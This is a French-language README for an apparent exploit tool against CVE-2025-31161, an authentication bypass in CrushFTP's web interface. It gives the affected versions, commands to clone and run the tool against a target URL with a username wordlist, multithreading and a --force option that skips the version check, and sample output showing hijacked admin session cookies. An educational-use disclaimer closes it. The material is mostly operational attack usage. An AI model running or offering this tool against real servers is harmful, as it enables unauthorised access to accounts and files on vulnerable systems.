
CrushFTP CVE-2025-31161 Outil d'exploit 🔓
CVE-2025-31161 est une vulnérabilité critique de contournement d'authentification dans l'interface Web de CrushFTP. En manipulant l'en-tête HTTP Authorization, un attaquant non authentifié peut obtenir un accès complet sous n'importe quel nom d'utilisateur valide sans fournir le mot de passe correct.
Versions affectées
CrushFTP 9.3.8
CrushFTP 9.3.9
CrushFTP 9.3.10
CrushFTP 9.3.11
CrushFTP 9.3.12
Versions Enterprise de CrushFTP antérieures à 9.3.12.5
pip install requests colorama urllib3
pip install requests colorama urllib3
git clone https://github.com/TX-One/CVE-2025-31161.git
cd CVE-2025-31161
python3 tx-crush.py -h
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json
-h, --help Affiche ce message d'aide et quitte
-t, --target TARGET URL cible (ex. https://example.com:8080)
-u, --users USERS Fichier contenant la liste des noms d'utilisateur
-o, --output OUTPUT Fichier JSON de sortie
-T, --threads THREADS
Nombre de threads (par défaut : 5)
--no-ssl Désactiver la vérification SSL
--timeout TIMEOUT Délai d'attente de la requête (par défaut : 15)
--retries RETRIES Nombre de tentatives (par défaut : 3)
--force Ignorer la vérification de version
python3 exploit.py
-t https://vulnerable-server.com:8000
-u ./wordlists/common_users.txt
-o ./results/compromised.json
-T 10
--retries 5
--timeout 20
[
{
"target": "https://victim:8080",
"user": "admin",
"success": true,
"method": "Bearer",
"cookies": {"sessionID": "a1b2c3..."},
"server_version": "CrushFTP/9.3.12"
}
]
[
{
"target": "http://victim:8080",
"user": "admin",
"success": false
}
]
Avertissement : Ce projet est destiné uniquement à des fins éducatives et de recherche en sécurité. Une utilisation responsable est requise.